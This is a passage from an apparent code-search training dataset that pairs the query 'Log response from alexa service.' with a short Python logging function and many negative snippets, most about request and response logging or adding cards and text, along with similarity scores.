draw_text(\n self,\n text: str,\n transform: Matrix44,\n properties: Properties,\n cap_height: float,\n ) -> None:\n raise 
NotImplementedError", "def create(self, section, text):\n payload = {}\n payload['introeditor[text]'] = text\n return self._create(section, payload)", "def add_text(self, tag, text_string, global_step=None):\n if text_string is None:\n # Visdom doesn't support tags, write the tag as the text_string\n text_string = tag\n self.vis.text(text_string)", "def addCard(self, flag, player, card):\n self.board.flags[flag].add_card(player, card)\n self.engine.output_handler.play_action(player, card, flag + 1)\n self.latestPlayer = player", "def insert_cards(self, cards: List[str], deck: str) -> None:\n deck = self.collection.decks.byName(deck)\n if deck is None:\n raise ValueError(\"Deck doesn't exist\")\n\n for card in cards:\n note = self._create_card(self.DEFAULT_MODEL)\n note.model()['did'] = deck['id'] # Make card's deck be `deck`\n note.fields[0] = card # fields=[content, tags]\n self.collection.addNote(note)\n # Card IDs are timestamps (integer milliseconds). Avoid collisions\n # by staggering insertion time\n time.sleep(0.002)\n \n self._remove_duplicates()\n self.collection.save() # Commit to database", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n scale = string(card, 2, 'scale')\n x1_npoints = integer_or_double(card, 3, 'x1/npoints')\n if isinstance(x1_npoints, integer_types):\n npoints = x1_npoints\n assert 0 < npoints < 7, 'CBARAO npoints=%r must be 1-6' % npoints\n x1 = double(card, 4, 'x1')\n delta_x = double(card, 5, 'delta_x')\n x = np.linspace(x1, x1 + delta_x * (npoints-1), num=npoints)\n assert len(x) == npoints, x\n else:\n x = [\n x1_npoints,\n double_or_blank(card, 4, 'x2'),\n double_or_blank(card, 5, 'x3'),\n double_or_blank(card, 6, 'x4'),\n double_or_blank(card, 7, 'x5'),\n double_or_blank(card, 8, 'x6'),\n ]\n x = [xi for xi in x if xi is not None]\n assert len(card) <= 9, f'len(CBARAO card) = {len(card):d}\\ncard={card}'\n return CBARAO(eid, scale, x, comment=comment)", "def addContent(self, text):\n text = _coercedUnicode(text)\n c = self.children\n if len(c) > 0 and isinstance(c[-1], unicode):\n c[-1] = c[-1] + text\n else:\n c.append(text)\n return c[-1]", "def add_msg(pos, msg):\n return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), shadow=(0, 0, 0, 1),\n parent=base.a2dTopLeft, align=TextNode.ALeft,\n pos=(0.08, -pos - 0.04), scale=.05)", "def draw_card(self,card):\n self.hand.append(card)", "def add_cloud_plugin_content(self, content):", "def add_text(article):\n raw_html = smart_wget(article['url'])\n article['text'] = _get_text(raw_html)\n return article", "def add_chapter(self, xhtml, linear=\"yes\"):\n assert isinstance(xhtml, XHTMLFile)\n\n src = \"%s/%s\" % (self.TEXT, xhtml.filename)\n self.opf.add_manifest(xhtml.uid, src, xhtml.media_type)\n self.opf.add_spine(xhtml.uid, linear)\n\n self.ncx.add_item(xhtml.uid, xhtml.title, src)\n\n filename = os.path.join(\"OEBPS\", self.TEXT, xhtml.filename)\n self.zip.writestr(filename, str(xhtml))", "def insert_card(db_conn, data):\n\n schema = get_card_schema(data)\n if not schema:\n return data, [{\n 'name': 'kind',\n 'message': 'Missing card kind.',\n }]\n card, errors = insert_entity(schema, db_conn, data)\n if not errors:\n save_entity_to_es('card', deliver_card(card, access='view'))\n return card, errors", "def add(self, credit_card: CreditCard):\n self._iframe_fill(\n \"braintree-hosted-field-number\", self.cc_number, credit_card.number)\n self._iframe_fill(\n \"braintree-hosted-field-cvv\", self.cvv, credit_card.cvc)\n self._iframe_fill(\n \"braintree-hosted-field-expirationDate\", 
self.expiration,\n f\"{credit_card.exp_month:02d}{credit_card.exp_year}\")", "def create(self, name):\n # TODO(multilang): it must receive information about both languages.\n cardlist = List(name=name)\n self.session.add(cardlist)\n self.session.commit()\n return domain.List(id=cardlist.id, name=cardlist.name)", "def add_card(self, card):\n if not isinstance(card, Card):\n raise TypeError(\"'card' must be a card object.\")\n # append new card to list of cards in the hand\n self.cards.append(card)\n self.total = card + self.total\n # aces require a little more work\n if card.rank == 14:\n self.soft = True\n self.num_aces += 1\n self.num_hard_aces += 1\n # account for soft hands\n if self.total > 21 and self.soft:\n self.total -= 10\n self.num_hard_aces -= 1\n self.soft = False\n # catch the edge case where you're delt 12+ aces\n if self.total > 21:\n self.total -= 10\n self.num_hard_aces -= 1\n self.soft = False\n if self.num_hard_aces > 0:\n self.soft = True\n if self.total > 21:\n self.bust = True", "def add_blog(self, text):\n self.blog.add_blog(text)\n self.refresh()", "def add_text(self, text, color, pos, font):\n text = font.render(text, True, color)\n text_rec = text.get_rect(center=pos)\n self.window.blit(text, text_rec)", "def add_file(self, filename):\n f = open(filename, 'r', encoding='utf8', errors='ignore')\n text = f.read()\n f.close()\n self.add_string(text)", "def create_card(self, trello, name):\n\n trello_card = trello.create_card(self._list_data, name)\n new_card = Card(trello, self, trello_card)\n self._cards.append(new_card)\n\n return new_card", "def fill_cards_markup(self, script_manager):\n for card in self.cards:\n card.fill_markup(self._trello, script_manager)" ]
[ "0.61664975", "0.6056356", "0.6032832", "0.5922822", "0.5634238", "0.5634238", "0.5634238", "0.5634238", "0.5613592", "0.5592778", "0.5525272", "0.54307914", "0.53953665", "0.5383566", "0.53688663", "0.53124416", "0.52927655", "0.52916425", "0.5291438", "0.52559805", "0.52509606", "0.5248879", "0.5228947", "0.5227708", "0.52236855", "0.51972026", "0.5187254", "0.5162527", "0.51565605", "0.51430494", "0.51423275", "0.5140959", "0.51349455", "0.5123339", "0.5111939", "0.5108536", "0.5076445", "0.5073518", "0.50480217", "0.5023039", "0.50161606", "0.50112474", "0.4993653", "0.49922442", "0.49700442", "0.49154446", "0.49154443", "0.4908235", "0.48993552", "0.48984635", "0.48937374", "0.48936898", "0.4869215", "0.48651975", "0.48491514", "0.48454666", "0.48398057", "0.48326546", "0.47864896", "0.4775855", "0.4774372", "0.47719663", "0.47553638", "0.47487384", "0.472924", "0.47291243", "0.47288162", "0.4728807", "0.47276568", "0.4721579", "0.47120976", "0.4709705", "0.46969357", "0.4696275", "0.46906072", "0.4687777", "0.46875238", "0.46811587", "0.468036", "0.46745625", "0.46737492", "0.46680686", "0.46538126", "0.46465948", "0.46448052", "0.46445715", "0.46402764", "0.46400982", "0.46318278", "0.4629734", "0.46170175", "0.46129873", "0.4608926", "0.45873144", "0.45846382", "0.4580307", "0.4580283", "0.45801643" ]
0.622388
2
Log response from alexa service.
def log_response(handler_input, response): # type: (HandlerInput, Response) -> None print("Alexa Response: {}\n".format(response))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def on_response(self, response):\n log.debug(\"Received response: %s\", response)", "def on_a(self):\r\n self.log()", "def log_response(task_request, response):\n msg = \"{0.status_code} {0.reason} for {0.url}: {0.content}\".format(response)\n log_info(task_request, msg)", "def __call__(self, request):\n request.start_time = time.time()\n\n response = self.get_response(request)\n\n log_data = self.extract_log_info(request=request, response=response)\n logger.info(log_data)\n\n return response", "def logging_response(response, status_code=200):\n if status_code != 200:\n log = app.logger.error\n else:\n log = app.logger.info\n log(response)\n return Response(response, status_code)", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n msg = self.make_access_message(resp, req, environ, request_time)\n try:\n self.access_log.info(msg)\n except:\n self.error(traceback.format_exc())", "def alexa_handler(event, context, env_vars=None):\n\n if env_vars is None: # pragma: no cover\n env_vars = os.environ\n\n setup_logging()\n\n # If calling from a scheduled event, this is only a 'warmup' call\n if event.get('detail-type') == 'Scheduled Event':\n logging.info('Warmup only, returning early')\n return\n\n logging.debug('Event:\\n%s', json.dumps(event))\n\n latitude, longitude = get_geo_coordinates(event=event)\n response = query_dark_sky(latitude, longitude)\n weather = parse_weather(response)\n to_speak = build_text_to_speak(weather)\n\n return {\n 'version': '1.0',\n 'response': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': to_speak\n }\n }\n }", "def after_request(response):\n # TODO: Send log reports to a monitor service such as DataDog?\n return response", "def handle_response(self, response):\n self.__log(f'Received response from server. 
The code is: \"{response}\"')\n if not response.status_code == 200:\n self.handle_api_error(response)\n self.to_output_file(response.text)", "def log(self, request, response, time):\n try:\n fmt_info = self.colorize_atoms(\n self._format_line(request, response, time)\n )\n\n values = list()\n extra = dict()\n for key, value in fmt_info:\n values.append(value)\n\n if key.__class__ is str:\n extra[key] = value\n else:\n extra[key[0]] = {key[1]: value}\n\n self.logger.info(\n self.colorize_msg(\n str(response.status), self._log_format % tuple(values),\n ),\n extra=extra\n )\n\n except Exception:\n self.logger.exception(\"Error in logging\")", "def after_request(response):\n logger = logging.getLogger(\"app.access\")\n logger.info(\n \"%s [%s] %s %s %s %s %s %s %s\",\n request.remote_addr,\n dt.utcnow().strftime(\"%d/%b/%Y:%H:%M:%S.%f\")[:-3],\n request.method,\n request.path,\n request.scheme,\n response.status,\n response.content_length,\n request.referrer,\n request.user_agent,\n )\n return response", "def after(response):\n app.logger.info(\"Local Timestamp: {}\".format(str(datetime.now())))\n app.logger.info(\"Response Code: {}\".format(response.status))\n app.logger.info(\"Response Headers:{}\\n{}\\n{}\".format(\"-\"*43,str(response.headers)[:-3], \"-\"*60))\n # hide password from logs\n body = response.json\n if type(body) is dict and \"password\" in body:\n body['password'] = \"[provided]\"\n if type(body) is dict and \"access_token\" in body:\n body['access_token'] = \"[provided]\"\n app.logger.info(\"Response Body: {}\\n\".format(body))\n return response", "def log_requests(response):\n ts = strftime('[%Y-%b-%d %H:%M-%S]')\n\n logger.info('Flask: {0} {1} {2} {3} {4} {5}'.\n format(ts, request.remote_addr, request.method, request.scheme, request.full_path, response.status))\n\n return response", "def logResponse(url=None,respCode=None,error=None,elapsed=None):\n if respCode <> 200:\n logging.error('URL: %s, Response: %s, Error: %s, Elapsed: %s' % (url, respCode, error,elapsed))\n else:\n logging.info('URL: %s, Response: %s, OK: %s, Elapsed: %s' % (url, respCode,error,elapsed))", "def log_request_response(task_request, response):\n log_request(task_request, response.request)\n log_response(task_request, response)", "def web_logger(response):\n LOG.info('%s %s %s %s', flask.request.remote_addr, flask.request.method,\n flask.request.full_path, response.status)\n return response", "def test_response_in_logs(self):\n operator = SimpleHttpOperator(\n task_id='test_HTTP_op',\n method='GET',\n endpoint='/',\n http_conn_id='HTTP_EXAMPLE',\n log_response=True,\n )\n\n with patch.object(operator.log, 'info') as mock_info:\n operator.execute(None)\n mock_info.assert_called_with(AnyStringWith('Example Domain'))", "def _log_request(res: SpamResult) -> None:\n _log.info(f\"requestId=[{request.id}] result=[{res.label}] reason=[{res.reason}]\")", "def access(self, resp, req, environ, request_time):\n if not (self.cfg.accesslog or self.cfg.logconfig or self.cfg.syslog):\n return\n\n atoms = self.atoms(resp, req, environ, request_time)\n\n # wrap atoms:\n # - make sure atoms will be tested properly\n # - if atom doesn't exist replace it by '-'\n safe_atoms = self.atoms_wrapper_class(atoms)\n safe_atoms = self.colorize_atoms(safe_atoms)\n try:\n msg = self.cfg.access_log_format % safe_atoms\n self.access_log.info(self.colorize_msg(atoms['s'], msg))\n except:\n self.error(traceback.format_exc())", "def _log_response(*, log_path: Path, ip_dict: Dict[str, int], response: Response) -> None:\n 
LOGGER.info(f\"logged request: {response.url}\")\n with log_path.open(mode=\"a\", encoding=\"utf-8\") as f:\n all_responses = [response]\n\n # Poll and wait for operations, if applicable\n is_operation_request = bool(\n re.match(re.compile(\".*/api/versioned/v1/operations/.*\"), response.url)\n )\n is_get_request = response.request.method == \"GET\"\n if is_get_request and is_operation_request:\n wait_resp = _collect_operation_calls(response=response)\n all_responses.extend(wait_resp)\n\n all_json = [_response_to_json(r, ip_dict) for r in all_responses]\n f.writelines([f\"{j}\\n\" for j in all_json])", "def test_get_event_log(event_log_api_setup):\n api_response = event_log_api_setup.get_event_log(\n event_log_id=1,\n )\n logging.getLogger().info(\"%s\", api_response)\n print(f\"{BCOLORS.OKGREEN}OK{BCOLORS.ENDC}\")", "def CallbackLogger(response):\n\tglobal Parent\n\tparsedresponse = json.loads(response)\n\tif parsedresponse[\"status\"] == \"error\":\n\t\tParent.Log(\"OBS Remote\", parsedresponse[\"error\"])\n\treturn", "def log_envoy_output( log, envoy_response ):\n return_dict = {\n u'status_code': envoy_response.status_code, # int\n u'std_out': envoy_response.std_out.decode(u'utf-8'),\n u'std_err': envoy_response.std_err.decode(u'utf-8'),\n u'command': envoy_response.command, # list\n u'history': envoy_response.history # list\n }\n log.info( u'in utils.log_helper.log_envoy_output(); envoy_output, `%s`' % return_dict )\n return return_dict", "def writeResponse(response):", "def service_panel_eventlog(self, call):\r\n _LOGGER.debug(\"alarm control panel received event log request\")\r\n if type(call.data) is dict or str(type(call.data)) == \"<class 'mappingproxy'>\":\r\n code = \"\"\r\n if ATTR_CODE in call.data:\r\n code = call.data[ATTR_CODE]\r\n _LOGGER.debug(\"alarm control panel making event log request\")\r\n ##self.hass.data[DOMAIN][\"command_queue\"].put_nowait([\"eventlog\", self.decode_code(code)])\r\n if self.visprotocol is not None:\r\n self.visprotocol.GetEventLog(self.decode_code(code))\r\n # self.process_command([\"eventlog\", self.decode_code(code)])\r\n else:\r\n _LOGGER.debug(\"alarm control panel not making event log request %s %s\", type(call.data), call.data)", "def emit(self, record):\n log_entry = self.format(record)\n try: \n requests.post(self.host+self.url, log_entry,headers={\"Content-type\": \"application/json\"}).content\n except Exception as e:\n if self.debug:\n print(e)", "def process_say(data):\n logger.info(f\"Said: {data}\")", "def log(response: ClientResponse, body: bytes) -> None: # pragma: no cover\n if response.status in STATUS_OK:\n loggerlevel = logger.info\n # Comments and reviews are too long to be logged for INFO level\n if response.url.name in (\"comments\", \"reviews\"):\n data = response.url.name.upper()\n else:\n data = body.decode(UTF_8_CHARSET)\n else:\n loggerlevel = logger.error\n data = body.decode(UTF_8_CHARSET)\n version = response.version\n if version is not None:\n version = f\"{version.major}.{version.minor}\"\n loggerlevel(\n 'api \"%s %s %s %s\" => %s',\n response.method,\n response.url.raw_path_qs,\n f\"{response.url.scheme.upper()}/{version}\",\n data,\n f\"{response.status}:{response.reason}\",\n )", "def log_request(handler_input):\n # type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def log_request(handler_input):\n # type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def log_request(handler_input):\n 
# type: (HandlerInput) -> None\n print(\"Alexa Request: {}\\n\".format(handler_input.request_envelope.request))", "def record(self, response):\n self.get_recorder().record(self.request, response)", "def log_result(server, ret_xml):\n\n tree = xml.dom.minidom.parseString(ret_xml)\n\n try:\n message = tree.getElementsByTagName(\"message\")[0].firstChild.nodeValue\n except IndexError:\n logging.warning('XML returned did not contain a message, or was malformed.')\n message = 'Nonexistent'\n\n try:\n meta = tree.getElementsByTagName(\"output\")[0].firstChild.nodeValue\n except IndexError:\n logging.warning('XML returned did not contain a message, or was malformed.')\n meta = 'Nonexistent'\n\n logging.info('Message from NRDP server (%s): %s', server, message)\n logging.info('Meta output from NRDP server (%s): %s', server, meta)", "def test_get_event_logs(event_log_api_setup):\n api_response = event_log_api_setup.get_event_logs(limit=100, offset=0)\n logging.getLogger().info(\"%s\", api_response)\n print(f\"{BCOLORS.OKGREEN}OK{BCOLORS.ENDC}\")", "def respond(self, resp):\n self.push(resp + '\\r\\n')\n self.logline('==> %s' % resp)", "def api_access_logging(\n request,\n endpoint,\n user_input,\n http_response_code,\n custom_error_code,\n api_version\n):\n aal = ApiAccessLog()\n\n aal.date = timezone.now()\n aal.url = request.get_full_path()\n aal.user = request.user\n aal.endpoint = endpoint\n aal.user_input = user_input\n aal.http_response_code = http_response_code\n aal.custom_error_code = custom_error_code\n aal.api_version = api_version\n\n try:\n ip = request.META['REMOTE_ADDR']\n aal.ip = ip\n except KeyError:\n pass\n\n try:\n referer = request.META['HTTP_REFERER']\n aal.referer = referer\n except KeyError:\n pass\n\n try:\n user_agent = request.META['HTTP_USER_AGENT']\n aal.user_agent = user_agent\n except KeyError:\n pass\n\n try:\n remote_host = request.META['REMOTE_HOST']\n aal.remote_host = remote_host\n except KeyError:\n pass\n\n try:\n remote_user = request.META['REMOTE_USER']\n aal.remote_user = remote_user\n except KeyError:\n pass\n\n aal.save()", "def _handle_aprs_error(self, failure):\n\n # Log the error\n logging.error(\"An error occured in the '\"+self._service_id+\"' service while querying the APRS.fi API: \"+\n failure.getErrorMessage())\n\n return None", "def attach_request_log(response):\n allure.attach(\n dump.dump_all(response).decode(\"utf-8\"),\n name=\"Full request log\",\n extension=\"txt\",\n )", "def after_request(response):\n # This avoids the duplication of registry in the log,\n # since that 500 is already logged via @app.errorhandler.\n if response.status_code != 500:\n ts = strftime('[%Y-%b-%d %H:%M]')\n message = '{0} {1} {2} {3} {4} {5}'.format(\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n response.status)\n print(message)\n return response", "def on_saga_success(self):\n\n logger.info(f'Saga {self.saga_id} succeeded')", "def handle_response(self, lvap):\n\n lvaps = RUNTIME.tenants[self.tenant_id].lvaps\n\n if lvap.addr not in lvaps:\n return\n\n self.handle_callback(lvap)", "def on_response(self, response):\n if log.isEnabledFor(logging.DEBUG):\n log.debug(\n 'RESPONSE MESSAGE RECEIVED %s %s',\n repr(self),\n response,\n )\n\n self.response_queue.put(response)", "def test_rsp_success(self):\n\n def handle(event):\n return 0x0000, event.action_information\n\n self.ae = ae = AE()\n ae.acse_timeout = 5\n ae.dimse_timeout = 5\n ae.network_timeout = 5\n ae.add_supported_context(ProceduralEventLogging)\n scp = 
ae.start_server(\n (\"localhost\", 11112), block=False, evt_handlers=[(evt.EVT_N_ACTION, handle)]\n )\n\n ae.add_requested_context(ProceduralEventLogging)\n assoc = ae.associate(\"localhost\", 11112)\n assert assoc.is_established\n\n ds = Dataset()\n ds.PatientName = \"Test^test\"\n status, ds = assoc.send_n_action(\n ds, 1, ProceduralEventLogging, \"1.2.840.10008.5.1.1.40.1\"\n )\n assert status.Status == 0x0000\n assert ds.PatientName == \"Test^test\"\n assoc.release()\n assert assoc.is_released\n\n scp.shutdown()", "def log(self):\n resp = requests.get(\"%s/api/log\"%self.urlbase, verify=False)\n return resp.json[\"log\"]", "def record_response(self, result: str) -> None:\n self.finish_time = datetime.now()\n self.elapsed_time = (self.finish_time - self.start_time).total_seconds()\n self.result = result\n if not self.failed_when_contains:\n self.failed = False\n elif not any(err in result for err in self.failed_when_contains):\n self.failed = False", "def handle_acsserver_response(self,message,conn):\n response=ResponseClientHandle.switch_msg_stream_type_str2dict(message)\n \n msg_type=response.get(event.KEY_MESSAGE)\n msg_group = int(msg_type) & 0xFF00\n \n #特殊处理AGENT 构建的给ACS的TIMOUT消息响应\n if self.msg_type == event.EV_RPC_AGENT_TIMEOUT_POST:\n if msg_type == event.EV_RPC_AGENT_TIMEOUT_RSP:\n log.debug_info(\"ACS server's response check agent timeout rpc request suc\")\n else:\n log.debug_info(\"ACS server's response check agent timeout rpc request fail\")\n \n return\n \n #检查消息的合法性\n #response message type error\n if not self.handle_response_message_type_verify(msg_group,msg_type,response):\n #check EV_RPC_CHECK_FAIL response\n if (msg_type==event.EV_RPC_CHECK_FAIL):\n\n tmp_obj = response.get(event.KEY_OBJECT)\n strio = StringIO(tmp_obj)\n tmp_msg_key_obj = pickle.load(strio)\n \n if not (isinstance(tmp_msg_key_obj,event.MsgUserRpcCheck)):\n err_info = \"ACS server's rpc response message type error\"\n log.debug_info(err_info)\n\n else:\n tmp_response_dict_ret=tmp_msg_key_obj.dict_ret\n if \"str_result\" in tmp_response_dict_ret:\n rc_str_result = tmp_response_dict_ret.get(\"str_result\")\n err_info = \"ACS server's rpc response check message fail, str_result: \" + rc_str_result\n log.debug_info(err_info)\n \n else:\n err_info = \"ACS server's rpc response message not found dict_ret data\"\n log.debug_info(err_info)\n \n else:\n err_info = \"ACS server's rpc response message type error\"\n log.debug_info(err_info)\n \n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)\n return\n \n #response rpc post\n if (msg_group == event.EVENT_QUERY_GROUP or\n msg_group == event.EVENT_CONFIGURE_GROUP ): \n \n # send response to user or ACS\n ResponseClientHandle.handle_send_response(response,conn)\n \n elif (msg_group == event.EVENT_RPC_GROUP):\n \n if not DUTqueue.WAIT_RPC_RESPONSE_POST_FALG:\n # send response to user or ACS\n ResponseClientHandle.handle_send_response(response,conn)\n else:\n self.set_rpc_request_ACSServer_check_response(\"request_suc\")\n \n #response worklist build/bind/reserve/start/finish info post\n elif (msg_group == event.EVENT_WORKLIST_GROUP):\n\n self.handle_ACS_worklist_info_response(response,conn)\n \n else:\n err_info = \"Unsupport msg event group:%d\" % msg_group\n log.debug_info(err_info)\n ResponseClientHandle.handle_except(self.msg,self.conn,err_info)", "async def _analog_mapping_response(self, data):\n self.query_reply_data[PrivateConstants.ANALOG_MAPPING_RESPONSE] = \\\n data[1:-1]", "async def _analog_mapping_response(self, data):\n 
self.query_reply_data[PrivateConstants.ANALOG_MAPPING_RESPONSE] = \\\n data[1:-1]", "def log_AD_results(xp_path, learner):\n\n log_file = \"{}/log.txt\".format(xp_path)\n log = open(log_file, \"a\")\n\n log.write(\"Results\\n\\n\")\n\n log.write(\"Train AUC: {} %\\n\".format(round(learner.diag['train']['auc'][-1]*100, 4)))\n log.write(\"Train accuracy: {} %\\n\".format(round(learner.diag['train']['acc'][-1], 4)))\n log.write(\"Train time: {}\\n\\n\".format(round(learner.train_time, 4)))\n\n log.write(\"Val AUC: {} %\\n\".format(round(learner.diag['val']['auc'][-1] * 100, 4)))\n log.write(\"Val accuracy: {} %\\n\\n\".format(round(learner.diag['val']['acc'][-1], 4)))\n\n log.write(\"Test AUC: {} %\\n\".format(round(learner.diag['test']['auc'][-1]*100, 4)))\n log.write(\"Test accuracy: {} %\\n\".format(round(learner.diag['test']['acc'][-1], 4)))\n log.write(\"Test time: {}\\n\".format(round(learner.test_time, 4)))\n\n log.write(\"\\n\\n\")\n log.close()", "def callback(response):\n error_msg = None\n if response.status_code >= 300 and response.status_code < 500:\n resp = response.json()\n if response.status_code == 401 and resp.get(\"message\") == \"Authentication Error\":\n raise AuthenticationError()\n\n msg = resp.get('messages') or resp.get('message')\n details = resp.get('details')\n error_msg = u\"ReaQta Error: \\n status code: {0}\\n message: {1}\\n details: {2}\".format(\n response.status_code,\n msg,\n details)\n\n return response, error_msg", "def logOutput(self, line):\r\n self.writeToLog('output', line)", "def _kantara_log_assertion_id(self, saml_response, ticket):\n printed = False\n try:\n parser = DefusedElementTree.DefusedXMLParser()\n xml = DefusedElementTree.XML(str(saml_response), parser)\n\n # For debugging, it is very useful to get the full SAML response pretty-printed in the logfile directly\n self.logger.debug(\"Created AuthNResponse :\\n\\n{!s}\\n\\n\".format(DefusedElementTree.tostring(xml)))\n printed = True\n\n attrs = xml.attrib\n assertion = xml.find('{urn:oasis:names:tc:SAML:2.0:assertion}Assertion')\n self.logger.info(\n '{!s}: id={!s}, in_response_to={!s}, assertion_id={!s}'.format(\n ticket.key, attrs['ID'], attrs['InResponseTo'], assertion.get('ID')\n )\n )\n\n return DefusedElementTree.tostring(xml)\n except Exception as exc:\n self.logger.debug(\"Could not parse message as XML: {!r}\".format(exc))\n if not printed:\n # Fall back to logging the whole response\n self.logger.info(\"{!s}: authn response: {!s}\".format(ticket.key, saml_response))", "def respond(self, response):\n self.response = response", "def log(msg):\n\tfrom http_request import req\n\tif not req: return\n\t\t\n\tif not req.out.get('_log'):\n\t\treq.out['_log'] = []\n\treq.out['_log'].append(msg)", "def apiai_response(query, session_id):\n\trequest = ai.text_request()\n\trequest.lang='en'\n\trequest.session_id=session_id\n\trequest.query = query\n\tresponse = request.getresponse()\n\treturn json.loads(response.read().decode('utf8'))", "def log():\n data = {}\n log = {}\n log['dia'] = date.today().strftime(\"%d/%m/%Y\")\n log['info'] = ('Rooms IP: %s %s %s')%(request.remote_addr,request.method, request.url)\n data['data'] = log\n try:\n r = requests.post(uri, json=data)\n except requests.exceptions.RequestException as e:\n print(e)\n print(\"\\n\\nThe microservice Log is unvailable. 
The Log is %s.\"%(log['info']))\n else:\n if r.status_code == 200:\n print(\"Register Log was a success\")\n else:\n print(\"Register Log was an unsuccess\")", "def getLog():\n with open(webapp.config['LOGFILE'], 'r') as logfile:\n output = logfile.read()\n if request.headers['Accept'] == 'application/json':\n return output, 200\n else:\n return render_template(\"output.html\", output=output)", "def getLog(self):\n \n return self.resp[\"log\"]", "def __send_response(self, response):\n logger.debug(' >>> %s', binascii.b2a_qp(response[0]))\n self.request.send(struct.pack('!I', len(response)))\n self.request.send(response)", "def get_server_logs(self):\n self.response.content\n binary_body = re.split('--==.*==', self.response.content)[2].split('\\r\\n')[5]\n\n f = StringIO.StringIO()\n f.write(bytearray(binary_body))\n\n memory_zip = ZipFile(f)\n zip_content = {name: memory_zip.read(name) for name in memory_zip.namelist()}\n oracc_log = zip_content['oracc.log']\n request_log = zip_content['request.log']\n\n # Check if server returns a lemmatised file\n autolem = None \n for key, value in zip_content.iteritems():\n if key.endswith(\"autolem.atf\"):\n autolem = value\n\n print zip_content.keys()\n print \"@\"*30\n print oracc_log\n print \"@\"*30\n print request_log\n print \"@\"*30\n if autolem:\n print autolem\n print \"@\"*30\n\n return oracc_log, request_log, autolem", "def log(self, message):", "def emit(self, record):\n data = getattr(record, 'synchrolog', {})\n if not data:\n return\n\n url = data.pop('url', None)\n\n if not url:\n return\n\n headers = {'Authorization': f'Basic {self.access_token}'}\n response = requests.post(url=url, json=data, headers=headers)\n if response.status_code >= 400:\n print('Could not send logging info to synchrolog server\\n\\n', response.text)", "def verif_response(response):\n if response.status_code >= 200 and response.status_code <= 299:\n logging.debug(\"response server OK::{}\".format(response.text))\n return True\n\n logging.error(\"response server KO::{}\".format(response.text))\n return False", "def test_get_authentication_log_v1(self):\n response = self.client_list.get_authentication_log(api_version=1)[0]\n uri, args = response[\"uri\"].split(\"?\")\n\n self.assertEqual(response[\"method\"], \"GET\")\n self.assertEqual(uri, \"/admin/v1/logs/authentication\")\n self.assertEqual(util.params_to_dict(args)[\"account_id\"], [self.client_list.account_id])", "def parse_aunit_response(aunit_results_xml):\n\n xml_handler = AUnitResponseHandler()\n xml.sax.parseString(aunit_results_xml, xml_handler)\n\n return xml_handler", "def logResult(self, tcid, result):\n record = logging.LogRecord(None, None, None, None, \"TEST COMPLETED - ID: %s w/ STATUS: %s\", (tcid, result),\n None)\n handlers = self.logger.handlers\n for handler in handlers:\n handler.emit(record)", "def response(service, ip, port, response, user=None, status_code=None):\n\n timestamp = format_time(get_time())\n coordinates = get_coordinates(ip)\n\n if not user:\n user = PLACEHOLDER_STRING\n if not status_code:\n status_code = PLACEHOLDER_STRING\n\n values = defaultdict(lambda: PLACEHOLDER_STRING,\n {'event_type': 'response',\n '@timestamp': timestamp,\n 'service': service,\n 'ip': ip,\n 'port': port,\n 'user': user,\n 'response': response,\n 'request_type': status_code,\n 'honeypotID': ID})\n \n if coordinates:\n values['coordinates'] = '{:.4f},{:.4f}'.format(coordinates[0], coordinates[1])\n\n if Config.use_broker:\n BrokerEndpoint.BrokerEndpoint.sendLogs(json.dumps(values))\n\n if 
coordinates:\n values['lat'] = '{:.4f}'.format(coordinates[0])\n values['lon'] = '{:.4f}'.format(coordinates[1])\n\n message = ('{@timestamp} - [RESPONSE] - {service}, {ip}:{port}, Lat: {lat}, Lon: {lon}, '\n '{response}, {user}, {request_type}').format_map(values)\n _log_alert(message)", "def log_handler(event):\n try:\n if not event.get('isError') or 'failure' not in event:\n return\n\n err = event['failure']\n\n # Don't report Rollbar internal errors to ourselves\n if issubclass(err.type, ApiException):\n log.error('Rollbar internal error: %s', err.value)\n else:\n report_exc_info((err.type, err.value, err.getTracebackObject()))\n except:\n log.exception('Error while reporting to Rollbar')", "def after_request(response):\n # This avoids the duplication of registry in the log,\n # since that 500 is already logged via @app.errorhandler.\n if response.status_code != 500:\n ts = strftime('[%Y-%b-%d %H:%M]')\n logger.error('%s %s %s %s %s %s',\n ts,\n request.remote_addr,\n request.method,\n request.scheme,\n request.full_path,\n response.status)\n return response", "def LogData(\n serverName: str, pubIp: str, apiName: str, result,\n request: dict):\n log_id = str(uuid.uuid4())\n dateTime = str(datetime.today())\n if \"Image\" in request:\n request['Image'] = str(request['Image'])\n if \"File\" in request:\n request['File'] = str(request['File'])\n\n paramData = json.dumps(request)\n errorInfo = sys.exc_info()\n errorMessage = \"\"\n if errorInfo[2] is not None:\n errorMessage = f'Error at lineNumber: {str(errorInfo[2].tb_lineno)} {str(errorInfo[0])} {str(errorInfo[1])}'\n info = {\n \"log_Id\": log_id, \"ServerName\": serverName, \"DateTime\": dateTime,\n \"PublicIP\": pubIp, \"APIName\": apiName,\n \"Result\": errorMessage + str(result), \"ParameterData\": str(paramData)\n\n }\n logger = logging.getLogger(__name__)\n logger.info(f'{info}')\n return log_id", "def get_response(self):\n result = self.get_response_impl()\n if self.log_dest is not None:\n is_error, response = result\n if is_error:\n response = \"? 
